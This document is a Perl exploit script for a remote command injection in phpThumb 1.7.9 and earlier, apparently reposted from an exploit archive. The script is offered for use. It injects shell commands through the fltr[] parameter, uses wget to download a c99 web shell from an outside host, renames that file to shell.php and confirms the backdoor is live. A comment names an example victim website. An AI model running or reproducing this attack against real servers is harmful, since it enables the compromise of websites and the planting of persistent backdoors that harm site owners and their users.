Код:
#!/usr/bin/perl
# Exploit Title: phpThumb v. <= 1.7.9 Remote Command Injection (Automatic Shell Upload)
# Date: 09/09/2013
# Author: D35m0nd142
# Vendor Homepage: http://phpthumb.sourceforge.net/
# Tested on: phpThumb 1.7.9
# Enter the website in this form --> http://mobileworld24.pl/wp-content/themes/mobileworld24/inc/phpThumb/
use LWP::UserAgent;
use HTTP::Request;
$target = $ARGV[0];
if($target eq '')
{
print "======================================================\n";
print " phpThumb <= 1.7.9 Remote Command Injection exploit \n";
print " (Automatic Shell Upload) \n";
print " created by D35m0nd142 \n";
print "======================================================\n";
sleep(0.8);
print "Usage: perl phpthumb.pl <target> \n";
exit(1);
}
if ($target !~ /http:\/\//)
{
$target = "http://$target";
}
#print "[*] Enter the address of your hosted TXT shell (ex: 'http://c99.gen.tr/r57.txt') => ";
#$shell = <STDIN>;
#sleep(1);
print "======================================================\n";
print " phpThumb <= 1.7.9 Remote Command Injection exploit \n";
print " (Automatic Shell Upload) \n";
print " created by D35m0nd142 \n";
print "======================================================\n";
sleep(1.1);
print "[*] Sending exploit ... \n";
sleep(1.1);
$agent = LWP::UserAgent->new();
$agent->agent('Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1');
#print "Enter the command to execute => ";
#$cmd = <STDIN>;
$website = "$target/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg; wget kratos91.altervista.org/c991.txt -O c991.txt; &phpThumbDebug=9";
$request = $agent->request(HTTP::Request->new(GET=>$website));
if ($request->is_success && ($request->content =~ /Malformed header from CGI/ || $request->content =~ /Saving to: / ))
{
print "[+] Exploit sent with success. \n";
sleep(1.4);
}
else
{
print "[-] Exploit sent but probably the website is not vulnerable. \n";
sleep(1.3);
}
print "[*] Controlling if the txt shell has been uploaded ...\n";
sleep(1.2);
$cwebsite = "$target/c991.txt";
$creq = $agent->request(HTTP::Request->new(GET=>$cwebsite));
if ($creq->is_success && ($creq->content =~ /c99shell.php/ || $creq->content =~ /shell/ ))
{
print "[+] Txt Shell uploaded :) \n";
sleep(1);
print "[*] Moving it to PHP format ... wait please ... \n";
sleep(1.1);
$mvwebsite = "$target/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg; mv c991.txt shell.php; &phpThumbDebug=9";
$mvreq = $agent->request(HTTP::Request->new(GET=>$mvwebsite));
$cwebsite = "$target/shell.php";
$c2req = $agent->request(HTTP::Request->new(GET=>$cwebsite));
if ($c2req->is_success && ($c2req->content =~ "/<b>Command execute<\/b><\/a> ::<\/b><\/p><\/td></tr/" || $c2req->content =~ /Safe-mode/ || $c2req->content =~ /c99shell/ || $c2req->content =~ /r57shell/ || $c2req->content =~ /uname -a/ || $c2req->content =~ /shell/ ))
{
print "[+] PHP Shell injected => '$cwebsite' :) \n";
sleep(0.8);
print "[*] Do you want to open it? (y/n) => ";
$open = <STDIN>;
if ($open == "y")
{
$firefox = "firefox $cwebsite";
system($firefox);
}
}
else
{
print "[-] Error while moving shell from Txt to Php :( \n";
exit(1);
}
}
else
{
print "[-] Txt shell not uploaded. :( \n";
}
# EA7A463C7ED9EED8 1337day.com [2013-09-10] 488B65854B8805CB #Есть видео работы сплоита.
